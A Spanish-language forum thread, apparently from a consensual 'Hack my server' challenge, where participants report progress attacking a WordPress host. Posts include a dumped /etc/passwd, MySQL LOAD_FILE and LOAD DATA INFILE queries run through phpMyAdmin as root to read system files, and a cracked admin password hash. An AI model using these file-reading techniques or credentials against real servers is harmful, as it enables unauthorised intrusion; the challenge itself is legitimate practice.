Autor
|
Tema: Hack my server II (Leído 87,654 veces)
|
#!drvy
|
Es que lo mas gracioso de todo es que la carpeta /uploads no existe xD http://host.net/wp-content/uploads/
Saludos
|
|
|
En línea
|
|
|
|
MinusFour
|
No hay permisos de escritura en la carpeta upload tampoco, lo acaba de probar, trate de hacer un post y esto fue lo que me dijo:
The uploaded file could not be moved to .
Aunque bien puede ser que no exista la carpeta uploads o que haya un .htaccess denegando xD.
|
|
|
En línea
|
|
|
|
Baal_30
Desconectado
Mensajes: 248
|
"tonto" jejeje
Teniendo la pass de admin, ¿no se pueden crear directorios y tal? O sea, crear la carpeta upload y todo eso... ¿o eso se hace sólo desde el server con algún programa de los que se usan?
Disculpen mi ignorancia :/
|
|
|
En línea
|
«La suerte es el cuidado de los detalles». -Winston Churchill
|
|
|
MinusFour
|
"tonto" jejeje
Teniendo la pass de admin, ¿no se pueden crear directorios y tal? O sea, crear la carpeta upload y todo eso... ¿o eso se hace sólo desde el server con algún programa de los que se usan?
Disculpen mi ignorancia :/
Esa pass la ha puesto yo xD así que dudo mucho que haya otro servicio con esa password xDDD. Alguien cambio la password original de todos modos, así que no podemos saber si la pass original servia para otras cosas.
|
|
|
En línea
|
|
|
|
Baal_30
Desconectado
Mensajes: 248
|
jaja pues si tuvieramos la pass original quizás serviría para otras cosas... pero bueno, entrando con la cuenta de admin y esa pass no se puede hacer lo que necesitamos ¿?
|
|
|
En línea
|
«La suerte es el cuidado de los detalles». -Winston Churchill
|
|
|
#!drvy
|
Buenas Algo de progreso... /etc/passwd - sin contraseñas root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/s... irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/... nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal... sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin syslog:x:103:106::/home/syslog:/bin/false klog:x:104:107::/home/klog:/bin/false bind:x:105:109::/var/cache/bind:/bin/false smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se... smmsp:x:107:111:Mail Submission Program,,,:/var/li... landscape:x:108:112::/var/lib/landscape:/bin/false mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.
Saludos
|
|
|
En línea
|
|
|
|
dimitrix
|
Please, explica como llegaste hasta ahi :-)
|
|
|
En línea
|
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Buenas Algo de progreso... /etc/passwd - sin contraseñas root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/s... irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/... nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal... sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin syslog:x:103:106::/home/syslog:/bin/false klog:x:104:107::/home/klog:/bin/false bind:x:105:109::/var/cache/bind:/bin/false smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se... smmsp:x:107:111:Mail Submission Program,,,:/var/li... landscape:x:108:112::/var/lib/landscape:/bin/false mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.
Saludos Usando el interprete sql de phpmyadmin select load_file("/etc/passwd") from dual Yo llevo rato leyendo files para ver si descubro algun path... he estado mirando por los *.conf de apache pero no encuentro nada pa pillar el path de la web.....
|
|
|
En línea
|
|
|
|
#!drvy
|
Perdon xD Bueno, tenemos acceso a PHPMyAdmin como root, tenemos todos los privilegios, esto lo podemos ver usando la pestaña Users de PHPMyAdmin. root 127.0.0.1 No ALL PRIVILEGES YesSabiendo esto, sabemos que tenemos acceso a funciones como LOAD DATA o DUMPFILE. Por tanto, podemos crear una tabla, y usar LOAD DATA para ver el contenido de ficheros a los que tenemos acceso. LOAD DATA INFILE '/etc/passwd' INTO TABLE BaseDeDatos.tabla;
PD: @xustyx has mirado el directorio de webmin ? Yo es que no lo encuentro por ninguna parte xDPD2: He vuelto a poner la contraseña original del usuario admin de WP (aclaro que no fui yo el que la cambio). Para quitaros trabajo inútil: a7c85c1a6114797d06425195899a8abe = 2bc11f PD3: El directorio de webmin es /usr/share/webmin Saludos
|
|
« Última modificación: 1 Agosto 2014, 20:40 pm por #!drvy »
|
En línea
|
|
|
|
daryo
|
aun se puede pedir la ip ? jeje
|
|
|
En línea
|
buenas
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Counter Strike 1.5 Hack Server
Juegos y Consolas
|
*StoW*
|
0
|
3,689
|
19 Octubre 2006, 22:22 pm
por *StoW*
|
|
|
Internal Server Error(hack web cross)
WarZone
|
Angbroda
|
5
|
6,426
|
3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
|
|
|
Torneo Hack my Server
« 1 2 ... 6 7 »
Foro Libre
|
dimitrix
|
62
|
23,192
|
1 Agosto 2014, 03:04 am
por dimitrix
|
|
|
Hack My Server III
« 1 2 »
Foro Libre
|
dimitrix
|
16
|
6,667
|
30 Marzo 2015, 18:47 pm
por elmatador2
|
|
|
Hack my server 2018
« 1 2 »
Hacking
|
dimitrix
|
16
|
19,818
|
28 Mayo 2018, 22:06 pm
por hitori batusai
|
|